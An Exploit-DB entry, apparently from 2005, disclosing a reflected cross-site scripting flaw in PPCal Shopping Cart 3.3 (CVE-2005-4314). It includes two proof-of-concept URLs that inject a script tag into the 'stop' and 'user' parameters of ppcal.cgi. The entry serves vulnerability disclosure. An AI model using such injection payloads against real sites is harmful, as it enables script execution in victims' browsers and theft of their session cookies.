PPCal Shopping Cart 3.3 - Cross-Site Scripting Vulnerability

2005-12-15T00:00:00
ID EDB-ID:26850
Type exploitdb
Reporter r0t3d3Vil
Modified 2005-12-15T00:00:00

Description

PPCal Shopping Cart 3.3 Cross-Site Scripting Vulnerability. CVE-2005-4314. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/15892/info

PPCal Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/ppcal.cgi?action=shop&user=8001&start=21
&stop=%22%3E%3Cscript%3Ealert('r0t')%3C
/script%3E

http://www.example.com/ppcal.cgi?action=shop&user=%22%3E%3Cscri
pt%3Ealert('r0t')%3C/script%3E